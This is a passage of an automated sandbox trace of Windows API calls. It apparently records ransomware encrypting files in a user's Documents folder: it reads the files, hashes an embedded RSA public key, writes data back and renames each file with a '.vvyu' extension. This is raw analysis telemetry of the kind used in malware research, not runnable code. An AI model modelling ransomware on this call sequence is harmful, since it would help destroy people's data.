| out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2920 | out: hHeap=0x2c0000) returned 1 [0188.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0188.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.894] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x51e1, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x51e1, lpOverlapped=0x0) returned 1 [0188.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.895] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x51e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.895] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.897] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.897] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.897] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.897] CloseHandle (hObject=0x584) returned 1 [0188.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0188.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af1f88 [0188.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0188.899] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\3_n MMYV5XKxtc1mbc-U.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\3_n mmyv5xkxtc1mbc-u.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\3_n MMYV5XKxtc1mbc-U.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\3_n mmyv5xkxtc1mbc-u.pdf.vvyu")) returned 1 [0188.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.901] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.904] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a50ba20, ftCreationTime.dwHighDateTime=0x1d83356, ftLastAccessTime.dwLowDateTime=0xa39c8a60, ftLastAccessTime.dwHighDateTime=0x1d88723, ftLastWriteTime.dwLowDateTime=0xa39c8a60, ftLastWriteTime.dwHighDateTime=0x1d88723, nFileSizeHigh=0x0, nFileSizeLow=0x8145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5usDb JNuS3uVdkW.xlsx", cAlternateFileName="5USDBJ~1.XLS")) returned 1 [0188.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2920 [0188.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2920 | out: hHeap=0x2c0000) returned 1 [0188.904] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\5usDb JNuS3uVdkW.xlsx") returned=".xlsx" [0188.904] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\5usDb JNuS3uVdkW.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\5usdb jnus3uvdkw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.905] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=33093) returned 1 [0188.905] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.909] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x811f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.909] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.911] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.911] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x8145, lpOverlapped=0x0) returned 1 [0188.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.912] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.914] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.914] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.914] GetLastError () returned 0x0 [0188.914] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.914] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.914] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.914] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.915] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8150) returned 0x2af5168 [0188.915] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2920 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2968 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da18 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0188.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.919] GetCurrentThreadId () returned 0x5d8 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2eea40 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.920] GetCurrentThreadId () returned 0x5d8 [0188.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, 